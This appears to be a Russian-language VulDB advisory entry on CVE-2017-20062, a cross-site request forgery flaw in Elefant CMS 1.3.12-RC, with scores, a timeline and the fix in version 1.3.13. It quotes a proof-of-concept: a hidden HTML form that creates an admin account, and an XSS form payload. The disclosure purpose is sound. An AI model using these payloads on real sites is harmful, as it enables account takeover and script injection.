Elefant CMS 1.3.12-RC неизвестная уязвимость

CVSS Meta Temp ScoreТекущая цена эксплуатации (≈)Балл интереса CTI
4.3$0-$5k0.05

Уязвимость, классифицированная как проблемные, была найдена в Elefant CMS 1.3.12-RC. Затронута неизвестная функция. Определение CWE для уязвимости следующее CWE-352. Консультацию можно прочитать на сайте seclists.org.

Выявление этой уязвимости является CVE-2017-20062. Атака может быть инициирована удаленно. Технические подробности отсутствуют. Сложность атаки довольно высока. Известно, что эксплуатация является сложной. Популярность этой уязвимости ниже среднего. Более того, существует эксплойт. Эксплойт был раскрыт общественности и может быть использован. Текущая цена за эксплойт может составлять около USD $0-$5k в настоящее время.

Объявляется proof-of-concept. Эксплойт доступен по адресу seclists.org. Уязвимость обрабатывалась как непубличный эксплойт нулевого дня в течение как минимум 283 дней. Мы ожидаем, что 0-день стоил приблизительно $0-$5k. Код, используемый эксплойтом, следующий:

<html> <body> <form action="http://localhost/user/add"; method
="POST"> <input type="hidden" name="name" value="admin3" /> <input type=
"hidden" name="email" value="admin3 () example com" /> <input type="hidden" name=
"password" value="admin3" /> <input type="hidden" name="verify_pass" value=
"admin3" /> <input type="hidden" name="type" value="admin" /> <input type=
"hidden" name="company" value="" /> <input type="hidden" name="title" value=""
/> <input type="hidden" name="website" value="" /> <input type="hidden" name=
"photo" value="" /> <input type="hidden" name="about" value="" /> <input type=
"hidden" name="phone" value="" /> <input type="hidden" name="fax" value="" />
<input type="hidden" name="address" value="" /> <input type="hidden" name=
"address2" value="" /> <input type="hidden" name="city" value="" /> <input type
="hidden" name="state" value="" /> <input type="hidden" name="country" value=""
/> <input type="hidden" name="zip" value="" /> <input type="submit" value=
"Submit request" /> </form> </body> </html> XSS: <html> <body> <form action=
"http://localhost/designer/preview"; method="POST"> <input type="hidden" name=
"layout" value="<img src=no onerror=alert(1)>" /> <input type="submit" value=
"Submit request" /> </form> </body> </html>

Обновление до версии 1.3.13 способно решить эту проблему. Рекомендуется обновить затронутый компонент.

ПродуктИнформация

Тип

Поставщик

Имя

Версия

CPE 2.3Информация

CPE 2.2Информация

CVSSv4Информация

VulDB CVSS-B Score: 🔍
VulDB CVSS-BT Score: 🔍
VulDB Вектор: 🔍
VulDB Надежность: 🔍

CVSSv3Информация

VulDB Meta Base Score: 5.0
VulDB Meta Temp Score: 4.3

VulDB Базовый балл: 5.0
VulDB Временная оценка: 4.3
VulDB Вектор: 🔍
VulDB Надежность: 🔍

CVSSv2Информация

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
ВекторСложностьАутентификацияКонфиденциальностьЦелостностьДоступность
разблокироватьразблокироватьразблокироватьразблокироватьразблокироватьразблокировать
разблокироватьразблокироватьразблокироватьразблокироватьразблокироватьразблокировать
разблокироватьразблокироватьразблокироватьразблокироватьразблокироватьразблокировать

VulDB Базовый балл: 🔍
VulDB Временная оценка: 🔍
VulDB Надежность: 🔍

Researcher Базовый балл: 🔍

ЭксплуатацияИнформация

Класс: подделка межсайтовых запросов
CWE: CWE-352 / CWE-862 / CWE-863
CAPEC: 🔍
ATT&CK: 🔍

Локальный: Нет
Удаленный: Да

Доступность: 🔍
Доступ: публичный
Статус: Proof-of-Concept
Автор: Tim Coen
Скачать: 🔍

EPSS Score: 🔍
EPSS Percentile: 🔍

Прогнозирование цены: 🔍
Оценка текущей цены: 🔍

0-Dayразблокироватьразблокироватьразблокироватьразблокировать
Сегодняразблокироватьразблокироватьразблокироватьразблокировать

Разведка угрозИнформация

Интерес: 🔍
Активные акторы: 🔍
Активные группы APT: 🔍

КонтрмерыИнформация

Рекомендуется: Обновление
Статус: 🔍

0-дневное время: 🔍
Время задержки эксплойта: 🔍

Обновление: CMS 1.3.13

Временная шкалаИнформация

09.05.2016 🔍
16.02.2017 +283 дни 🔍
16.02.2017 +0 дни 🔍
24.02.2017 +8 дни 🔍
18.06.2022 +1940 дни 🔍

ИсточникиИнформация

Консультация: Elefant CMS 1.3.12-RC: CSRF
Исследователь: Tim Coen
Организация: Curesec Research Team
Статус: Не определено

CVE: CVE-2017-20062 (🔍)
scip Labs: https://www.scip.ch/en/?labs.20161013
Смотрите также: 🔍

ВходИнформация

Создано: 24.02.2017 15:48
Обновлено: 18.06.2022 16:19
Изменения: 24.02.2017 15:48 (55), 24.02.2017 15:49 (2), 18.06.2022 16:19 (3)
Завершить: 🔍

Обсуждение

Interested in the pricing of exploits?

See the underground prices here!